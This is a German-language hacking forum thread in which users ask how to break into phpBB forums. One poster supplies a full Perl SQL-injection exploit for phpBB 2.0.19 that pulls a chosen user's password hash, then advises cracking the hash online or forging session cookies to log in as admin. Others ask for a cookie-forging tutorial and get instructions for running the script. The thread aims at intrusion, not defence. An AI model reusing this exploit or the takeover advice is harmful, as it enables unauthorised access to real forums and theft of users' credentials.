phpBB Knacken???

[Juizzz]

Hey leute wollte fragen mit welchem prog kann ich eine phpBB site knacken???

[nexos]

Version?
milw0rm.com

[Juizzz]

die neuste version 2

[Sniper Demon]

die neuste version 2

Die neuste Version 2...Aha... *lol*
Die neuste Version ist 2.0.22...Also eine genaue Angabe wäre besser die Version "2" gibt es nicht. Es hat immer ein 2.xxx hinten dran.



MfG Sniper Demon

[yw4n]

So jetzt nehmen wir an, dass er ein phpBB Forum der Version 2.0.22 knacken möchte.

Wie würdet ihr vorgehen?
Es interessiert mich nähmlich auch. :wink:
Ich hab schon so vieeele Seite durchgesucht nur nichts gefunden. Und All Topics Hack Sql injection birgt auch nichts, da sich nicht auf jedem Forum "alltopics.php" befindet. :cry:

[Sniper Demon]

Für Version 2.0.22 hab' ich auf die schnelle keinen Remote SQL Inection Exploit gefunden...Hier aber einer für Version 2.0.19:

Code:

#!/usr/bin/perl
print q{

#That?s my first exploit
#it?s for phpbb 2.0.19 boards ;-)
#-------------------------------------------------------------------------------------
#some stuff;-) :
#It?s an sql injection exploit
#u get the password of the id u have entered
######################################################################################
#greetings fly out to:                                                               #
#green, DeepEra, Serial-Killer, Force-Sniper, krypt0s, DevianX and my homie Ludger xD#
######################################################################################
#last words:   
#i just want to say that i hate cia-world and the sr crew ^^
#and last but not least thx for reading ;-)
#=====================================================================================
};
use IO::Socket;
print "\t\t  that?s my first exploit\n";
print "\t\twritten by JohnnyButterkeks\n\n\n";
print "plz tell me ur host(example: www.victim.com)\n";
$serv = <STDIN>;
print "now tell me the dir normally it?s /phpbb2/\n";
$dir = <STDIN>;
print "now i need thu user id from the admin or somebody else ;.)\n";
$id = <STDIN>;
print "your host is $serv the dir is $dir and the user id is $id .. is this right? than press one key ;-)";
$okay = <STDIN>;
print "[+]Make Connection\n";
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";
}

Den halt starten mit Active Perl und der Rest sollte sich von selbst erklären.


MfG Sniper Demon


Edit: Wenn der Exploit geklappt hat würde ich den Hash auf verschiedenen Online Cracker suchen wenn er nicht gefunden wurde in einige Online Cracker einfügen damit die versuchen den Hash zu cracken.
Wenn es keiner von denen schafft kann ich immer noch das Cookie faken und bin dann trotzdem als z.B. Admin eingeloggt ohne das Passwort im Klartext zu haben.

[yw4n]

@Sniper Demon

Könntest du vielleicht mal ein Tutorial erstellen, wie man sich mit Hilfe der Cookies als Admin einlogen kann? Ich wäre dir sehr dankbar! :wink:

(ich habe schon zwar solche Tuts gesehen, die waren aber alle in einer anderen Sprache :roll: )

[Sniper Demon]

@Sniper Demon

Könntest du vielleicht mal ein Tutorial erstellen, wie man sich mit Hilfe der Cookies als Admin einlogen kann? Ich wäre dir sehr dankbar! :wink:

(ich habe schon zwar solche Tuts gesehen, die waren aber alle in einer anderen Sprache :roll: )

Okay...Ich nimm als Beispiel aber ein wBB Forum, da man da die Version sofort sieht und nicht ausprobieren muss, falls changelog.html im Ordner docs nicht mehr drin ist...
Dabei ist man dann aber halt nur als Admin eingeloggt, aber kann nicht ins ACP (Administrator Control Panel) und im ACP kann man halt das meiste machen, wie Forum offline stellen index bearbeiten, an alle User eine Email schicken usw.
Naja, ich fang jetzt mal an...



MfG Sniper Demon

[rob00n]

execute it !?!?
google for "active perl"... the code is written in the perl-language... so you have to save it in a file with an .pl-ending and execute it (you need to have active perl installed)

[rob00n]

you have to execute it as a parameter for the perl.exe...